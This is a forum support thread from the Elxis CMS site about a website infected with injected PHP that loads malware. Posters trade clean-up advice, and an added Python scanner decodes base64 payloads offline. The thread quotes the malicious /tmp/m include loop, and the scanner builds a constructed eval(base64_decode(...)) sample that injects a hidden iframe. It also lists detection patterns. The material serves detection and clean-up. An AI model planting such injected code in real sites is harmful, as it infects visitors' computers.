Elxis CMS Forum
Support => Security => Topic started by: Dr_Monkey on February 27, 2009, 16:36:59
-
I get the following message from Google Chrome when I go to my site:
Warning: Visiting this site may harm your computer!
The website at <sitename removed> contains elements from the site 78.110.175.21, which appears to host malware – software that can hurt your computer or otherwise operate without your consent. Just visiting a site that contains malware can infect your computer.
Looks like a PDF is trying to be loaded. I don't have any PDF files on my site.
Not sure where to look to see how this malware is getting loaded.
Any ideas?
-
It is probably a virus on your server. The virus attaches itself to your files ... php files, html files ...
This is a server issue ... not an Elxis matter ... :)
-
Contact your hosting provider.
-
This is exactly what I mentioned: contact your hosting provider and tell them to check the server for viruses ...
-
If you have SSH/shell access, try to find the files that have the virus attached by using this command:
# search every regular file under the web root for the marker string; -print0/-0 keep file names with spaces intact
find . -type f -print0 | xargs -0 grep -sl 'Yahoo! Counter'
PS: if you are using a Linux-based server.
-
The post with the code has been removed for security reasons.
-
Looks like a PDF is trying to be loaded. I don't have any PDF files on my site.
Not sure where to look to see how this malware is getting loaded.
Any ideas?
Until your hosting provider checks, it is wise (and better than doing nothing) for you to check your files on the server...
If no shell access,
start with writable folders first, like ...
avatars, tmp, and look for strange names (do not delete anything if you are not sure)
or do something easier... start with the access and error logs of your server and the FTP logs.
Maybe the problem is in your folders, maybe somewhere else on the server....
**************
Are you sure that you didn't install 3rd-party modules, templates, components, etc.?
************
Do you have any kind of user uploads? (check the uploaded files)
etc.
-
I found some code in my index.php page that appears to create the script.
It defines a function using base64_decode. I created a test PHP page using echo base64_decode('blah'); where blah is the long encoded string, to see what was being created.
Unfortunately when I browse the test php page Google Chrome gives me the same warning my real page has.
Any ideas on how to display the encoded string without going to the website?
This post is probably outside the scope of this subsection of the forum and is not directly related to elxis, so I will delete if inappropriate, but I am very curious about how this code works.
-
The template's index.php?
Use another browser!
Can't you overwrite this suspicious index.php with the original? ... if it is hacked, or in any case ... just to be sure!
Use my profile..... attach this index.php to a zip and send it to me by email so I can see it....
if you want!
----------------------------------------------------------
Edit: this guy sent this to me... look at the screenshot.... What the hell is this...
I don't know of anything like this in any Elxis file!
Which file is this? What index.php? In which Elxis folder? Replace it immediately.
Read the first lines... it is looking for files inside /tmp/.... so this octopus might have company out there!
Edit 2: see >> (http://www.google.gr/search?q=for(%24i%3D1%3B%24i%3C100%3B%24i%2B%2B)+if(is_file(%24f%3D%27%2Ftmp%2Fm%27.%24i)){include_once(%24f)%3B&ie=utf-8&oe=utf-8&aq=t&rls=org.mozilla:el:official&client=firefox-a) ... you are not the only one...
If you are sure that it is not your fault (permissions... etc.), I think you should have a small conversation with your provider, then replace all passwords, and I hope you have taken a backup... because you are not sure what else might have been done to files, DB, etc.!
[attachment deleted by admin]
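The shell command earlier in the thread, the question about reading the base64 string without loading the page, and the /tmp/m include loop in the screenshot can all be handled offline. The script below is an added example for this thread, not code from Elxis or from any of the posters: it walks a copy of the web root, flags files matching patterns of this kind of injection (the regexes and the file-extension list are my own; the 'Yahoo! Counter' marker and the /tmp/m<N> loop are the ones named in the posts above), and decodes any base64_decode('...') literal in Python, so no PHP is ever executed. The infected index.php it scans is a constructed sample, and its iframe address uses a documentation IP range rather than the host named in the Chrome warning.

```python
"""Offline triage of PHP/HTML files for injected, obfuscated code.

Added example for this thread, not code from Elxis or from any poster.
It statically decodes base64_decode('...') arguments instead of running
them, and flags the /tmp/m<N> include loop and the 'Yahoo! Counter'
marker mentioned in the thread.
"""
import base64
import os
import re
from typing import Dict, List

# Patterns typical of the injection the thread describes.  The regexes are
# assumptions of this example; the marker strings come from the posts.
SUSPICIOUS_PATTERNS = {
    "base64_decode": re.compile(r"base64_decode\s*\("),
    "eval": re.compile(r"\beval\s*\("),
    "tmp_include_loop": re.compile(
        r"is_file\s*\(\s*\$\w+\s*=\s*['\"]/tmp/m['\"]\s*\.\s*\$\w+\s*\)"),
    "yahoo_counter_marker": re.compile(r"Yahoo! Counter"),
}

# base64_decode('....') with a literal argument: capture the literal so it
# can be decoded here, in Python, without PHP ever executing it.
B64_LITERAL = re.compile(
    r"base64_decode\s*\(\s*['\"]([A-Za-z0-9+/=\s]+)['\"]\s*\)")

# Assumed set of file types worth scanning in a CMS web root.
SCAN_EXTENSIONS = (".php", ".html", ".htm", ".inc")


def decode_base64_literals(text: str) -> List[str]:
    """Return the decoded form of every base64_decode('<literal>') in text."""
    decoded = []
    for match in B64_LITERAL.finditer(text):
        blob = re.sub(r"\s+", "", match.group(1))
        try:
            raw = base64.b64decode(blob, validate=True)
        except ValueError:
            continue  # not valid base64; skip rather than guess
        decoded.append(raw.decode("utf-8", errors="replace"))
    return decoded


def scan_text(text: str) -> Dict[str, object]:
    """Classify one file's contents: which patterns matched, plus any
    decoded base64 payloads (decoded, never executed)."""
    hits = [name for name, rx in SUSPICIOUS_PATTERNS.items() if rx.search(text)]
    return {"hits": hits, "decoded": decode_base64_literals(text)}


def scan_tree(root: str) -> Dict[str, Dict[str, object]]:
    """Walk a (copy of a) web root and report every file with a hit."""
    report = {}
    for dirpath, _, filenames in os.walk(root):
        for name in filenames:
            if not name.lower().endswith(SCAN_EXTENSIONS):
                continue
            path = os.path.join(dirpath, name)
            try:
                with open(path, "r", encoding="utf-8", errors="replace") as fh:
                    result = scan_text(fh.read())
            except OSError:
                continue
            if result["hits"]:
                report[path] = result
    return report


# Constructed sample of an infected index.php, built from a known payload so
# the decoding can be checked.  192.0.2.10 is a documentation address, not
# the host named in the thread.
PAYLOAD = b'echo "<iframe src=\\"http://192.0.2.10/x.pdf\\" width=1 height=1></iframe>";'
SAMPLE_INFECTED = (
    "<?php\n"
    "for($i=1;$i<100;$i++) if(is_file($f='/tmp/m'.$i)){include_once($f);}\n"
    "function ___x(){ eval(base64_decode('"
    + base64.b64encode(PAYLOAD).decode() + "')); }\n"
    "___x();\n"
    "?>\n"
    "<html><!-- Yahoo! Counter --></html>\n"
)

if __name__ == "__main__":
    import json
    import sys
    if len(sys.argv) > 1:
        print(json.dumps(scan_tree(sys.argv[1]), indent=2))
    else:
        print(json.dumps({"<constructed sample>": scan_text(SAMPLE_INFECTED)}, indent=2))
```

Run it as python3 scan_injection.py /path/to/copy-of-webroot (the file name is an assumption) and it prints, per flagged file, which patterns matched and the decoded payload text. This is the safe way to answer the "how do I see the encoded string without going to the website" question: echo base64_decode(...) in a test page runs the PHP and sends the decoded HTML/JS to the browser, which then loads the remote content, so Chrome warns again; decoding the literal in a separate tool shows the same text without rendering it.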
-
Check your current register_globals value; is it on?
-
Thanks for all the help.
I have deleted all the files from my site and I am in the process of reinstalling elxis. I am thinking my FTP account got hacked because almost every PHP file was infected by malicious code. Time to change passwords.
-
Dr_Monkey, I guess your server has register_globals ON. If yes, tell your hosting provider to disable register_globals. Also disable allow_url_fopen.